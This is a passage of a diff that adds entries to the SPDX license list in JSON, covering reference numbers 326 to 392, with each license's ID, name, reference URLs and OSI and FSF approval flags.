+ "reference": "https://spdx.org/licenses/CC-BY-NC-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0.json",
+ "referenceNumber": 326,
+ "name": "Creative Commons Attribution Non Commercial 3.0 Unported",
+ "licenseId": "CC-BY-NC-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.0.json",
+ "referenceNumber": 327,
+ "name": "Creative Commons Attribution Non Commercial 2.0 Generic",
+ "licenseId": "CC-BY-NC-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unlicense.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unlicense.json",
+ "referenceNumber": 328,
+ "name": "The Unlicense",
+ "licenseId": "Unlicense",
+ "seeAlso": [
+ "https://unlicense.org/"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPL-1.0.json",
+ "referenceNumber": 329,
+ "name": "Lucent Public License Version 1.0",
+ "licenseId": "LPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/LPL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/bzip2-1.0.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.5.json",
+ "referenceNumber": 330,
+ "name": "bzip2 and libbzip2 License v1.0.5",
+ "licenseId": "bzip2-1.0.5",
+ "seeAlso": [
+ "https://sourceware.org/bzip2/1.0.5/bzip2-manual-1.0.5.html",
+ "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Entessa.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Entessa.json",
+ "referenceNumber": 331,
+ "name": "Entessa Public License v1.0",
+ "licenseId": "Entessa",
+ "seeAlso": [
+ "https://opensource.org/licenses/Entessa"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-Patent.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Patent.json",
+ "referenceNumber": 332,
+ "name": "BSD-2-Clause Plus Patent License",
+ "licenseId": "BSD-2-Clause-Patent",
+ "seeAlso": [
+ "https://opensource.org/licenses/BSDplusPatent"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ECL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ECL-2.0.json",
+ "referenceNumber": 333,
+ "name": "Educational Community License v2.0",
+ "licenseId": "ECL-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/ECL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Crossword.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Crossword.json",
+ "referenceNumber": 334,
+ "name": "Crossword License",
+ "licenseId": "Crossword",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Crossword"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.json",
+ "referenceNumber": 335,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 1.0 Generic",
+ "licenseId": "CC-BY-NC-ND-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd-nc/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OCLC-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OCLC-2.0.json",
+ "referenceNumber": 336,
+ "name": "OCLC Research Public License 2.0",
+ "licenseId": "OCLC-2.0",
+ "seeAlso": [
+ "http://www.oclc.org/research/activities/software/license/v2final.htm",
+ "https://opensource.org/licenses/OCLC-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-1.1.json",
+ "referenceNumber": 337,
+ "name": "CeCILL Free Software License Agreement v1.1",
+ "licenseId": "CECILL-1.1",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V1.1-US.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-2.1.json",
+ "referenceNumber": 338,
+ "name": "CeCILL Free Software License Agreement v2.1",
+ "licenseId": "CECILL-2.1",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V2.1-en.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGDL-Taiwan-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGDL-Taiwan-1.0.json",
+ "referenceNumber": 339,
+ "name": "Taiwan Open Government Data License, version 1.0",
+ "licenseId": "OGDL-Taiwan-1.0",
+ "seeAlso": [
+ "https://data.gov.tw/license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Abstyles.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Abstyles.json",
+ "referenceNumber": 340,
+ "name": "Abstyles License",
+ "licenseId": "Abstyles",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Abstyles"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/libselinux-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/libselinux-1.0.json",
+ "referenceNumber": 341,
+ "name": "libselinux public domain notice",
+ "licenseId": "libselinux-1.0",
+ "seeAlso": [
+ "https://github.com/SELinuxProject/selinux/blob/master/libselinux/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ANTLR-PD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ANTLR-PD.json",
+ "referenceNumber": 342,
+ "name": "ANTLR Software Rights Notice",
+ "licenseId": "ANTLR-PD",
+ "seeAlso": [
+ "http://www.antlr2.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-or-later.json",
+ "referenceNumber": 343,
+ "name": "GNU General Public License v2.0 or later",
+ "licenseId": "GPL-2.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/IPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IPL-1.0.json",
+ "referenceNumber": 344,
+ "name": "IBM Public License v1.0",
+ "licenseId": "IPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/IPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-enna.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-enna.json",
+ "referenceNumber": 345,
+ "name": "enna License",
+ "licenseId": "MIT-enna",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT#enna"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CPOL-1.02.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CPOL-1.02.json",
+ "referenceNumber": 346,
+ "name": "Code Project Open License 1.02",
+ "licenseId": "CPOL-1.02",
+ "seeAlso": [
+ "http://www.codeproject.com/info/cpol10.aspx"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.json",
+ "referenceNumber": 347,
+ "name": "Creative Commons Attribution Share Alike 3.0 Austria",
+ "licenseId": "CC-BY-SA-3.0-AT",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/3.0/at/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.json",
+ "referenceNumber": 348,
+ "name": "GNU General Public License v3.0 w/GCC Runtime Library exception",
+ "licenseId": "GPL-3.0-with-GCC-exception",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gcc-exception-3.1.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-1-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-1-Clause.json",
+ "referenceNumber": 349,
+ "name": "BSD 1-Clause License",
+ "licenseId": "BSD-1-Clause",
+ "seeAlso": [
+ "https://svnweb.freebsd.org/base/head/include/ifaddrs.h?revision\u003d326823"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NTP-0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NTP-0.json",
+ "referenceNumber": 350,
+ "name": "NTP No Attribution",
+ "licenseId": "NTP-0",
+ "seeAlso": [
+ "https://github.com/tytso/e2fsprogs/blob/master/lib/et/et_name.c"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SugarCRM-1.1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SugarCRM-1.1.3.json",
+ "referenceNumber": 351,
+ "name": "SugarCRM Public License v1.1.3",
+ "licenseId": "SugarCRM-1.1.3",
+ "seeAlso": [
+ "http://www.sugarcrm.com/crm/SPL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT.json",
+ "referenceNumber": 352,
+ "name": "MIT License",
+ "licenseId": "MIT",
+ "seeAlso": [
+ "https://opensource.org/licenses/MIT"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.1-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.1-RFN.json",
+ "referenceNumber": 353,
+ "name": "SIL Open Font License 1.1 with Reserved Font Name",
+ "licenseId": "OFL-1.1-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+ "https://opensource.org/licenses/OFL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Watcom-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Watcom-1.0.json",
+ "referenceNumber": 354,
+ "name": "Sybase Open Watcom Public License 1.0",
+ "licenseId": "Watcom-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Watcom-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.json",
+ "referenceNumber": 355,
+ "name": "Creative Commons Attribution-NonCommercial-ShareAlike 2.0 France",
+ "licenseId": "CC-BY-NC-SA-2.0-FR",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.0/fr/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ODbL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ODbL-1.0.json",
+ "referenceNumber": 356,
+ "name": "Open Data Commons Open Database License v1.0",
+ "licenseId": "ODbL-1.0",
+ "seeAlso": [
+ "http://www.opendatacommons.org/licenses/odbl/1.0/",
+ "https://opendatacommons.org/licenses/odbl/1-0/"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/FSFULLR.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FSFULLR.json",
+ "referenceNumber": 357,
+ "name": "FSF Unlimited License (with License Retention)",
+ "licenseId": "FSFULLR",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License#License_Retention_Variant"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.3.json",
+ "referenceNumber": 358,
+ "name": "Open LDAP Public License v1.3",
+ "licenseId": "OLDAP-1.3",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003de5f8117f0ce088d0bd7a8e18ddf37eaa40eb09b1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SSH-OpenSSH.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SSH-OpenSSH.json",
+ "referenceNumber": 359,
+ "name": "SSH OpenSSH license",
+ "licenseId": "SSH-OpenSSH",
+ "seeAlso": [
+ "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/LICENCE#L10"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause.json",
+ "referenceNumber": 360,
+ "name": "BSD 2-Clause \"Simplified\" License",
+ "licenseId": "BSD-2-Clause",
+ "seeAlso": [
+ "https://opensource.org/licenses/BSD-2-Clause"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/HPND.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HPND.json",
+ "referenceNumber": 361,
+ "name": "Historical Permission Notice and Disclaimer",
+ "licenseId": "HPND",
+ "seeAlso": [
+ "https://opensource.org/licenses/HPND"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zimbra-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zimbra-1.3.json",
+ "referenceNumber": 362,
+ "name": "Zimbra Public License v1.3",
+ "licenseId": "Zimbra-1.3",
+ "seeAlso": [
+ "http://web.archive.org/web/20100302225219/http://www.zimbra.com/license/zimbra-public-license-1-3.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Borceux.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Borceux.json",
+ "referenceNumber": 363,
+ "name": "Borceux license",
+ "licenseId": "Borceux",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Borceux"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.1.json",
+ "referenceNumber": 364,
+ "name": "Open LDAP Public License v1.1",
+ "licenseId": "OLDAP-1.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d806557a5ad59804ef3a44d5abfbe91d706b0791f"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.0.json",
+ "referenceNumber": 365,
+ "name": "SIL Open Font License 1.0",
+ "licenseId": "OFL-1.0",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NASA-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NASA-1.3.json",
+ "referenceNumber": 366,
+ "name": "NASA Open Source Agreement 1.3",
+ "licenseId": "NASA-1.3",
+ "seeAlso": [
+ "http://ti.arc.nasa.gov/opensource/nosa/",
+ "https://opensource.org/licenses/NASA-1.3"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/VOSTROM.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/VOSTROM.json",
+ "referenceNumber": 367,
+ "name": "VOSTROM Public License for Open Source",
+ "licenseId": "VOSTROM",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/VOSTROM"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-0.json",
+ "referenceNumber": 368,
+ "name": "MIT No Attribution",
+ "licenseId": "MIT-0",
+ "seeAlso": [
+ "https://github.com/aws/mit-0",
+ "https://romanrm.net/mit-zero",
+ "https://github.com/awsdocs/aws-cloud9-user-guide/blob/master/LICENSE-SAMPLECODE"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ISC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ISC.json",
+ "referenceNumber": 369,
+ "name": "ISC License",
+ "licenseId": "ISC",
+ "seeAlso": [
+ "https://www.isc.org/licenses/",
+ "https://www.isc.org/downloads/software-support-policy/isc-license/",
+ "https://opensource.org/licenses/ISC"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unicode-DFS-2016.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2016.json",
+ "referenceNumber": 370,
+ "name": "Unicode License Agreement - Data Files and Software (2016)",
+ "licenseId": "Unicode-DFS-2016",
+ "seeAlso": [
+ "http://www.unicode.org/copyright.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BlueOak-1.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BlueOak-1.0.0.json",
+ "referenceNumber": 371,
+ "name": "Blue Oak Model License 1.0.0",
+ "licenseId": "BlueOak-1.0.0",
+ "seeAlso": [
+ "https://blueoakcouncil.org/license/1.0.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.json",
+ "referenceNumber": 372,
+ "name": "Licence Libre du Québec – Réciprocité forte version 1.1",
+ "licenseId": "LiLiQ-Rplus-1.1",
+ "seeAlso": [
+ "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-forte-liliq-r-v1-1/",
+ "http://opensource.org/licenses/LiLiQ-Rplus-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NOSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NOSL.json",
+ "referenceNumber": 373,
+ "name": "Netizen Open Source License",
+ "licenseId": "NOSL",
+ "seeAlso": [
+ "http://bits.netizen.com.au/licenses/NOSL/nosl.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SMLNJ.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SMLNJ.json",
+ "referenceNumber": 374,
+ "name": "Standard ML of New Jersey License",
+ "licenseId": "SMLNJ",
+ "seeAlso": [
+ "https://www.smlnj.org/license.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0+.json",
+ "referenceNumber": 375,
+ "name": "GNU Lesser General Public License v3.0 or later",
+ "licenseId": "LGPL-3.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CPAL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CPAL-1.0.json",
+ "referenceNumber": 376,
+ "name": "Common Public Attribution License 1.0",
+ "licenseId": "CPAL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/CPAL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/PSF-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PSF-2.0.json",
+ "referenceNumber": 377,
+ "name": "Python Software Foundation License 2.0",
+ "licenseId": "PSF-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Python-2.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RPL-1.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RPL-1.5.json",
+ "referenceNumber": 378,
+ "name": "Reciprocal Public License 1.5",
+ "licenseId": "RPL-1.5",
+ "seeAlso": [
+ "https://opensource.org/licenses/RPL-1.5"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.json",
+ "referenceNumber": 379,
+ "name": "BSD 2-Clause FreeBSD License",
+ "licenseId": "BSD-2-Clause-FreeBSD",
+ "seeAlso": [
+ "http://www.freebsd.org/copyright/freebsd-license.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-Modern-Variant.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-Modern-Variant.json",
+ "referenceNumber": 380,
+ "name": "MIT License Modern Variant",
+ "licenseId": "MIT-Modern-Variant",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:MIT#Modern_Variants",
+ "https://ptolemy.berkeley.edu/copyright.htm",
+ "https://pirlwww.lpl.arizona.edu/resources/guide/software/PerlTk/Tixlic.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Nokia.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Nokia.json",
+ "referenceNumber": 381,
+ "name": "Nokia Open Source License",
+ "licenseId": "Nokia",
+ "seeAlso": [
+ "https://opensource.org/licenses/nokia"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.json",
+ "referenceNumber": 382,
+ "name": "GNU Free Documentation License v1.1 only - no invariants",
+ "licenseId": "GFDL-1.1-no-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PDDL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PDDL-1.0.json",
+ "referenceNumber": 383,
+ "name": "Open Data Commons Public Domain Dedication \u0026 License 1.0",
+ "licenseId": "PDDL-1.0",
+ "seeAlso": [
+ "http://opendatacommons.org/licenses/pddl/1.0/",
+ "https://opendatacommons.org/licenses/pddl/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUPL-1.0.json",
+ "referenceNumber": 384,
+ "name": "European Union Public License 1.0",
+ "licenseId": "EUPL-1.0",
+ "seeAlso": [
+ "http://ec.europa.eu/idabc/en/document/7330.html",
+ "http://ec.europa.eu/idabc/servlets/Doc027f.pdf?id\u003d31096"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDDL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDDL-1.1.json",
+ "referenceNumber": 385,
+ "name": "Common Development and Distribution License 1.1",
+ "licenseId": "CDDL-1.1",
+ "seeAlso": [
+ "http://glassfish.java.net/public/CDDL+GPL_1_1.html",
+ "https://javaee.github.io/glassfish/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-only.json",
+ "referenceNumber": 386,
+ "name": "GNU Free Documentation License v1.3 only",
+ "licenseId": "GFDL-1.3-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.6.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.6.json",
+ "referenceNumber": 387,
+ "name": "Open LDAP Public License v2.6",
+ "licenseId": "OLDAP-2.6",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d1cae062821881f41b73012ba816434897abf4205"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/JSON.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/JSON.json",
+ "referenceNumber": 388,
+ "name": "JSON License",
+ "licenseId": "JSON",
+ "seeAlso": [
+ "http://www.json.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-or-later.json",
+ "referenceNumber": 389,
+ "name": "GNU Lesser General Public License v3.0 or later",
+ "licenseId": "LGPL-3.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0.json",
+ "referenceNumber": 390,
+ "name": "GNU General Public License v3.0 only",
+ "licenseId": "GPL-3.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Fair.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Fair.json",
+ "referenceNumber": 391,
+ "name": "Fair License",
+ "licenseId": "Fair",
+ "seeAlso": [
+ "http://fairlicense.org/",
+ "https://opensource.org/licenses/Fair"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-font-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-font-exception.json",
+ "referenceNumber": 392,
+ "name": "GNU General Public License v2.0 w/Font exception",
+ "licenseId": "GPL-2.0-with-font-exception",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-faq.html#FontException"
+ ],
